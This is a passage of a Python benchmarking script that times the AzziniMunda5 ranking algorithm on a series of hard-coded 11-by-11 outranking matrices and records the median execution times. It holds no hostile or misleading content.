[26,0,26,25,29,31,25,36,34,24,34],
[25,25,0,34,40,24,24,33,32,30,28],
[14,26,17,0,34,31,24,37,40,29,31],
[17,22,11,17,0,17,22,20,24,25,7],
[24,20,27,20,34,0,17,31,23,22,28],
[25,26,27,27,29,34,0,35,28,20,28],
[19,15,18,14,31,20,16,0,23,22,15],
[19,17,19,11,27,28,23,28,0,18,27],
[21,27,21,22,26,29,31,29,33,0,27],
[25,17,23,20,44,23,23,36,24,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 75, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,26,23,31,17,18,24,19,19,17],
[28,0,27,24,29,15,24,24,23,29,13],
[25,24,0,18,25,14,20,20,17,25,14],
[28,27,33,0,27,17,21,23,18,32,22],
[20,22,26,24,0,18,18,18,17,19,14],
[34,36,37,34,33,0,23,29,25,30,21],
[33,27,31,30,33,28,0,32,25,33,30],
[27,27,31,28,33,22,19,0,24,26,23],
[32,28,34,33,34,26,26,27,0,34,23],
[32,22,26,19,32,21,18,25,17,0,18],
[34,38,37,29,37,30,21,28,28,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 76, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,30,25,23,20,22,23,30,30,23],
[32,0,24,35,25,33,22,17,25,31,31],
[21,27,0,26,21,21,31,31,26,35,18],
[26,16,25,0,19,13,13,17,24,31,25],
[28,26,30,32,0,19,24,21,26,34,18],
[31,18,30,38,32,0,21,22,26,31,26],
[29,29,20,38,27,30,0,15,30,28,24],
[28,34,20,34,30,29,36,0,34,31,30],
[21,26,25,27,25,25,21,17,0,20,20],
[21,20,16,20,17,20,23,20,31,0,17],
[28,20,33,26,33,25,27,21,31,34,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 77, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,19,34,29,20,30,28,26,28,13],
[24,0,23,33,27,27,28,34,18,28,20],
[32,28,0,29,26,25,24,38,20,24,29],
[17,18,22,0,28,19,23,22,22,34,22],
[22,24,25,23,0,20,28,31,21,30,14],
[31,24,26,32,31,0,26,28,21,32,29],
[21,23,27,28,23,25,0,23,22,27,22],
[23,17,13,29,20,23,28,0,21,28,20],
[25,33,31,29,30,30,29,30,0,31,25],
[23,23,27,17,21,19,24,23,20,0,21],
[38,31,22,29,37,22,29,31,26,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 78, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,16,12,15,10,27,24,25,26,22],
[22,0,20,20,19,15,30,21,17,32,28],
[35,31,0,29,27,30,30,25,30,32,38],
[39,31,22,0,28,28,26,23,28,30,39],
[36,32,24,23,0,25,32,24,23,37,35],
[41,36,21,23,26,0,33,29,31,36,33],
[24,21,21,25,19,18,0,27,25,29,30],
[27,30,26,28,27,22,24,0,25,26,30],
[26,34,21,23,28,20,26,26,0,32,27],
[25,19,19,21,14,15,22,25,19,0,31],
[29,23,13,12,16,18,21,21,24,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 79, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,17,24,26,27,20,22,28,30,23],
[23,0,17,24,28,26,27,17,31,24,17],
[34,34,0,35,32,30,26,25,37,37,29],
[27,27,16,0,30,26,23,21,28,30,17],
[25,23,19,21,0,28,21,20,25,31,16],
[24,25,21,25,23,0,21,23,30,32,23],
[31,24,25,28,30,30,0,26,32,31,22],
[29,34,26,30,31,28,25,0,34,34,27],
[23,20,14,23,26,21,19,17,0,24,19],
[21,27,14,21,20,19,20,17,27,0,19],
[28,34,22,34,35,28,29,24,32,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 80, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,30,21,30,33,24,23,30,18,25],
[24,0,18,21,32,23,36,21,20,14,32],
[21,33,0,22,37,25,35,32,26,26,32],
[30,30,29,0,36,32,34,29,27,18,33],
[21,19,14,15,0,23,20,15,19,13,23],
[18,28,26,19,28,0,22,18,28,15,27],
[27,15,16,17,31,29,0,14,22,14,26],
[28,30,19,22,36,33,37,0,34,24,25],
[21,31,25,24,32,23,29,17,0,23,27],
[33,37,25,33,38,36,37,27,28,0,34],
[26,19,19,18,28,24,25,26,24,17,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 81, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,40,28,40,23,37,21,29,34,30,42],
[11,0,13,25,12,32,6,14,25,26,31],
[23,38,0,36,30,40,26,36,35,30,34],
[11,26,15,0,16,29,10,23,27,17,38],
[28,39,21,35,0,36,15,28,30,37,32],
[14,19,11,22,15,0,7,21,27,21,28],
[30,45,25,41,36,44,0,42,45,41,44],
[22,37,15,28,23,30,9,0,23,30,39],
[17,26,16,24,21,24,6,28,0,21,39],
[21,25,21,34,14,30,10,21,30,0,32],
[9,20,17,13,19,23,7,12,12,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 82, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,37,29,28,31,29,35,34,37,31],
[26,0,35,23,28,30,20,30,30,19,34],
[14,16,0,20,27,18,12,28,23,17,29],
[22,28,31,0,33,32,21,36,25,25,35],
[23,23,24,18,0,20,19,27,23,25,21],
[20,21,33,19,31,0,15,27,23,13,32],
[22,31,39,30,32,36,0,27,31,25,35],
[16,21,23,15,24,24,24,0,17,17,18],
[17,21,28,26,28,28,20,34,0,24,33],
[14,32,34,26,26,38,26,34,27,0,39],
[20,17,22,16,30,19,16,33,18,12,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 83, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,30,30,27,20,14,32,19,20,27],
[27,0,20,20,28,26,19,23,22,27,21],
[21,31,0,22,27,26,16,30,16,28,23],
[21,31,29,0,25,20,27,39,28,31,19],
[24,23,24,26,0,23,20,38,20,23,15],
[31,25,25,31,28,0,20,36,20,26,21],
[37,32,35,24,31,31,0,33,33,25,26],
[19,28,21,12,13,15,18,0,13,18,19],
[32,29,35,23,31,31,18,38,0,19,20],
[31,24,23,20,28,25,26,33,32,0,22],
[24,30,28,32,36,30,25,32,31,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 84, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,28,18,25,16,16,16,28,18,18],
[29,0,22,14,23,16,35,19,28,30,21],
[23,29,0,13,28,32,22,16,34,27,9],
[33,37,38,0,32,32,32,26,45,32,7],
[26,28,23,19,0,19,22,31,17,39,14],
[35,35,19,19,32,0,19,28,19,31,25],
[35,16,29,19,29,32,0,25,19,32,7],
[35,32,35,25,20,23,26,0,25,31,32],
[23,23,17,6,34,32,32,26,0,27,9],
[33,21,24,19,12,20,19,20,24,0,25],
[33,30,42,44,37,26,44,19,42,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 85, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,37,33,42,22,32,29,30,35,24],
[21,0,27,26,31,14,30,21,29,26,19],
[14,24,0,33,36,27,29,19,33,32,27],
[18,25,18,0,37,19,25,26,29,19,21],
[9,20,15,14,0,17,23,22,23,10,19],
[29,37,24,32,34,0,36,24,26,22,24],
[19,21,22,26,28,15,0,17,26,23,18],
[22,30,32,25,29,27,34,0,36,30,28],
[21,22,18,22,28,25,25,15,0,17,13],
[16,25,19,32,41,29,28,21,34,0,28],
[27,32,24,30,32,27,33,23,38,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 86, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,12,30,21,20,15,8,18,18,21,16],
[39,0,33,29,19,26,17,19,18,31,21],
[21,18,0,26,20,18,20,12,18,19,15],
[30,22,25,0,27,23,17,8,27,32,19],
[31,32,31,24,0,27,27,27,25,31,18],
[36,25,33,28,24,0,27,24,18,27,29],
[43,34,31,34,24,24,0,23,29,41,20],
[33,32,39,43,24,27,28,0,35,33,28],
[33,33,33,24,26,33,22,16,0,37,22],
[30,20,32,19,20,24,10,18,14,0,21],
[35,30,36,32,33,22,31,23,29,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 87, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,29,22,23,26,31,30,27,29,31],
[24,0,23,20,24,31,22,30,27,26,31],
[22,28,0,21,26,31,23,32,28,32,30],
[29,31,30,0,28,35,23,33,33,36,32],
[28,27,25,23,0,32,24,34,27,35,27],
[25,20,20,16,19,0,17,31,20,28,25],
[20,29,28,28,27,34,0,34,32,26,32],
[21,21,19,18,17,20,17,0,27,26,32],
[24,24,23,18,24,31,19,24,0,28,28],
[22,25,19,15,16,23,25,25,23,0,24],
[20,20,21,19,24,26,19,19,23,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 88, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,29,27,21,25,16,19,21,27,45],
[29,0,32,19,16,22,23,29,30,27,27],
[22,19,0,14,16,15,30,8,26,17,21],
[24,32,37,0,18,27,30,16,22,26,45],
[30,35,35,33,0,26,22,30,35,25,34],
[26,29,36,24,25,0,30,21,38,30,36],
[35,28,21,21,29,21,0,19,21,25,34],
[32,22,43,35,21,30,32,0,25,29,43],
[30,21,25,29,16,13,30,26,0,26,36],
[24,24,34,25,26,21,26,22,25,0,28],
[6,24,30,6,17,15,17,8,15,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 89, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,25,25,27,31,30,31,27,24,34],
[25,0,32,29,32,30,31,31,27,28,34],
[26,19,0,27,24,24,22,21,25,23,24],
[26,22,24,0,25,25,24,18,25,21,25],
[24,19,27,26,0,28,27,25,23,24,27],
[20,21,27,26,23,0,27,23,20,20,26],
[21,20,29,27,24,24,0,26,30,23,26],
[20,20,30,33,26,28,25,0,22,24,29],
[24,24,26,26,28,31,21,29,0,24,29],
[27,23,28,30,27,31,28,27,27,0,31],
[17,17,27,26,24,25,25,22,22,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 90, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,27,28,30,29,29,23,34,38,27],
[25,0,25,24,24,29,24,27,32,29,25],
[24,26,0,29,36,31,29,25,33,31,32],
[23,27,22,0,33,31,30,33,35,27,25],
[21,27,15,18,0,25,24,20,35,32,28],
[22,22,20,20,26,0,27,30,29,25,25],
[22,27,22,21,27,24,0,22,29,31,30],
[28,24,26,18,31,21,29,0,31,32,28],
[17,19,18,16,16,22,22,20,0,19,15],
[13,22,20,24,19,26,20,19,32,0,23],
[24,26,19,26,23,26,21,23,36,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 91, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,16,20,27,28,24,24,21,17,17],
[25,0,13,23,22,21,22,24,18,21,18],
[35,38,0,28,27,32,30,28,28,23,20],
[31,28,23,0,24,27,29,27,22,15,25],
[24,29,24,27,0,25,27,22,22,11,18],
[23,30,19,24,26,0,23,22,17,15,21],
[27,29,21,22,24,28,0,25,21,20,24],
[27,27,23,24,29,29,26,0,26,22,27],
[30,33,23,29,29,34,30,25,0,27,27],
[34,30,28,36,40,36,31,29,24,0,23],
[34,33,31,26,33,30,27,24,24,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 92, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,14,29,27,10,36,20,12,19,5,22],
[37,0,41,39,12,36,15,19,22,25,22],
[22,10,0,39,12,34,20,19,10,10,27],
[24,12,12,0,12,26,10,22,3,15,17],
[41,39,39,39,0,38,32,25,39,32,30],
[15,15,17,25,13,0,20,20,20,13,30],
[31,36,31,41,19,31,0,33,24,29,24],
[39,32,32,29,26,31,18,0,30,32,29],
[32,29,41,48,12,31,27,21,0,20,24],
[46,26,41,36,19,38,22,19,31,0,22],
[29,29,24,34,21,21,27,22,27,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 93, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,25,35,19,35,29,32,36,25,26],
[27,0,22,27,19,26,28,22,27,28,33],
[26,29,0,37,20,39,21,31,35,25,27],
[16,24,14,0,15,34,13,25,26,19,15],
[32,32,31,36,0,36,20,31,38,21,33],
[16,25,12,17,15,0,14,19,27,19,20],
[22,23,30,38,31,37,0,35,41,22,26],
[19,29,20,26,20,32,16,0,33,27,28],
[15,24,16,25,13,24,10,18,0,16,21],
[26,23,26,32,30,32,29,24,35,0,37],
[25,18,24,36,18,31,25,23,30,14,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 94, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,13,18,12,19,19,18,22,18,16,22],
[38,0,32,23,30,32,28,35,33,31,31],
[33,19,0,24,23,27,27,24,25,26,30],
[39,28,27,0,29,30,20,25,31,25,31],
[32,21,28,22,0,25,26,20,22,25,25],
[32,19,24,21,26,0,27,25,22,24,26],
[33,23,24,31,25,24,0,23,27,27,30],
[29,16,27,26,31,26,28,0,29,29,29],
[33,18,26,20,29,29,24,22,0,29,27],
[35,20,25,26,26,27,24,22,22,0,27],
[29,20,21,20,26,25,21,22,24,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 95, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,32,35,32,29,29,30,34,24,27],
[25,0,28,28,33,32,26,25,34,25,23],
[19,23,0,28,28,22,19,18,26,26,27],
[16,23,23,0,25,25,20,21,25,20,18],
[19,18,23,26,0,23,21,26,26,24,29],
[22,19,29,26,28,0,21,24,25,22,25],
[22,25,32,31,30,30,0,23,29,25,25],
[21,26,33,30,25,27,28,0,31,25,28],
[17,17,25,26,25,26,22,20,0,23,25],
[27,26,25,31,27,29,26,26,28,0,28],
[24,28,24,33,22,26,26,23,26,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 96, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,28,23,25,32,20,27,18,18,34],
[32,0,31,24,30,28,33,23,27,24,30],
[23,20,0,25,23,24,27,22,19,16,40],
[28,27,26,0,26,25,30,23,21,22,27],
[26,21,28,25,0,24,28,27,30,26,22],
[19,23,27,26,27,0,25,33,25,19,36],
[31,18,24,21,23,26,0,27,24,18,28],
[24,28,29,28,24,18,24,0,22,20,25],
[33,24,32,30,21,26,27,29,0,20,32],
[33,27,35,29,25,32,33,31,31,0,38],
[17,21,11,24,29,15,23,26,19,13,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 97, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,26,19,21,25,23,23,20,23,20],
[25,0,25,25,27,18,20,22,19,22,17],
[25,26,0,25,29,20,25,25,25,24,23],
[32,26,26,0,31,25,31,25,24,26,26],
[30,24,22,20,0,25,25,25,19,24,20],
[26,33,31,26,26,0,28,28,26,27,25],
[28,31,26,20,26,23,0,22,22,26,20],
[28,29,26,26,26,23,29,0,25,25,21],
[31,32,26,27,32,25,29,26,0,30,22],
[28,29,27,25,27,24,25,26,21,0,20],
[31,34,28,25,31,26,31,30,29,31,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 98, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,26,31,30,28,31,25,24,25,20],
[19,0,22,27,27,22,27,23,17,26,18],
[25,29,0,30,32,25,29,27,24,25,21],
[20,24,21,0,23,21,25,23,18,23,15],
[21,24,19,28,0,22,27,23,22,23,22],
[23,29,26,30,29,0,27,30,23,29,26],
[20,24,22,26,24,24,0,27,21,22,21],
[26,28,24,28,28,21,24,0,21,30,23],
[27,34,27,33,29,28,30,30,0,29,25],
[26,25,26,28,28,22,29,21,22,0,18],
[31,33,30,36,29,25,30,28,26,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 99, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,14,18,12,17,8,19,13,9,8,13],
[37,0,36,30,30,19,26,29,33,22,22],
[33,15,0,19,24,15,12,20,26,25,10],
[39,21,32,0,32,27,17,28,28,11,16],
[34,21,27,19,0,21,27,25,25,23,15],
[43,32,36,24,30,0,25,37,34,28,27],
[32,25,39,34,24,26,0,24,25,22,24],
[38,22,31,23,26,14,27,0,29,17,22],
[42,18,25,23,26,17,26,22,0,17,23],
[43,29,26,40,28,23,29,34,34,0,24],
[38,29,41,35,36,24,27,29,28,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 100, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,26,25,19,23,26,25,25,22,20],
[30,0,35,26,29,25,31,33,30,30,28],
[25,16,0,20,22,19,26,27,27,23,20],
[26,25,31,0,27,27,30,27,33,28,27],
[32,22,29,24,0,25,29,29,24,22,28],
[28,26,32,24,26,0,32,26,26,23,24],
[25,20,25,21,22,19,0,26,22,22,21],
[26,18,24,24,22,25,25,0,23,23,25],
[26,21,24,18,27,25,29,28,0,24,24],
[29,21,28,23,29,28,29,28,27,0,28],
[31,23,31,24,23,27,30,26,27,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 101, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,27,28,23,29,19,32,26,27,25],
[26,0,27,27,25,30,27,30,27,31,28],
[24,24,0,22,24,28,22,28,24,29,24],
[23,24,29,0,20,28,26,32,22,30,29],
[28,26,27,31,0,27,28,31,25,34,29],
[22,21,23,23,24,0,21,26,25,28,21],
[32,24,29,25,23,30,0,31,27,32,30],
[19,21,23,19,20,25,20,0,22,22,17],
[25,24,27,29,26,26,24,29,0,31,24],
[24,20,22,21,17,23,19,29,20,0,19],
[26,23,27,22,22,30,21,34,27,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 102, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,22,31,19,32,28,28,38,18,37],
[27,0,32,32,28,29,23,16,26,18,30],
[29,19,0,20,32,38,34,14,45,32,23],
[20,19,31,0,35,32,34,16,39,24,24],
[32,23,19,16,0,33,33,18,39,17,22],
[19,22,13,19,18,0,24,19,38,18,21],
[23,28,17,17,18,27,0,16,35,19,23],
[23,35,37,35,33,32,35,0,39,36,23],
[13,25,6,12,12,13,16,12,0,12,23],
[33,33,19,27,34,33,32,15,39,0,21],
[14,21,28,27,29,30,28,28,28,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 103, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,3,12,28,14,16,20,23,24,12],
[27,0,25,28,23,13,18,32,34,20,23],
[48,26,0,25,25,32,26,32,38,30,14],
[39,23,26,0,39,25,23,29,39,28,24],
[23,28,26,12,0,20,23,26,24,23,22],
[37,38,19,26,31,0,21,38,40,16,27],
[35,33,25,28,28,30,0,29,45,34,27],
[31,19,19,22,25,13,22,0,16,16,9],
[28,17,13,12,27,11,6,35,0,17,14],
[27,31,21,23,28,35,17,35,34,0,26],
[39,28,37,27,29,24,24,42,37,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 104, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,26,29,28,21,25,21,23,28,23],
[22,0,22,20,21,21,19,23,22,25,25],
[25,29,0,27,27,20,26,18,21,32,23],
[22,31,24,0,20,17,21,22,19,26,23],
[23,30,24,31,0,21,24,22,24,36,29],
[30,30,31,34,30,0,31,26,22,35,29],
[26,32,25,30,27,20,0,25,29,29,29],
[30,28,33,29,29,25,26,0,28,31,24],
[28,29,30,32,27,29,22,23,0,34,26],
[23,26,19,25,15,16,22,20,17,0,27],
[28,26,28,28,22,22,22,27,25,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 105, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
